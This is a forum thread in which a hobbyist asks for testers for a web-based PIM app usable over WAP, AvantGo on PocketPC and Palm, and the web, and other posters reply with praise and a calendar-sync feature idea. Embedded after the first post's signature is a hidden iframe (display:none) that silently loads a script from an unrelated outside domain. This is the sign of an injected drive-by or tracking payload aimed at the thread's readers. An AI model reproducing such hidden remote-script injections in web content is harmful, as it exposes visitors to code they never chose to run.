+ Reply to Thread

Anyone want to help test my PDA data app?

Ok, this probably exists already, but I started a project to learn some wap development, and it grew... just curious to see what you all think.

I have built a web based PIM application. You can view and enter data in one of 4 ways - WAP, AvantGo channel on PocketPC, AvantGo channel on palm, and directly though the web. Data on the web or wap is added instantly; information entered through AvantGo channels on pocketPC or Palm is saved until the next time you sync your device.

I am having fun with it; however, it is still in development and I am curious to see what you all think. I just liked the idea of being able to update my list from any of the devices I am constantly around, and having the results easily refreshable on some of the other devices I carry.

If you are interested in helping test this, PM me. The application details are available at: http://mmtserver.mmt.duq.edu/pdpda

Note: As this is in development, please do not enter secure or mission-critical data.
    Thanks!

Twyst<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Very interesting application, I'll put some serious thought into changing to this type of application.

Cool! Just at "playing stage" right now (although the lists should be fully functional... but if development goes smoothly and I get enough people interested, I might devote quite a lot of time to it over the holidays.

Any wishes for features?

Originally posted by twist0105
    Cool! Just at "playing stage" right now (although the lists should be fully functional... but if development goes smoothly and I get enough people interested, I might devote quite a lot of time to it over the holidays.

Any wishes for features?
    At one point when I was using Avantgo- it had an AD pop-up before getting to the homepage and on this AD (which was for a tv show) there was a button to add the show dates to the calendar- I pressed it and avantgo put the show directly in to the palmos-datebook on multiple dates too!

I never watched the show, but I was facinated that a webpage could pull this magic off! -- something like that would be nice, so you could log-in once to the portal and add the current day's events to the device. (with alerts preferrably)

Just an idea!
    iPhone therefore iAm.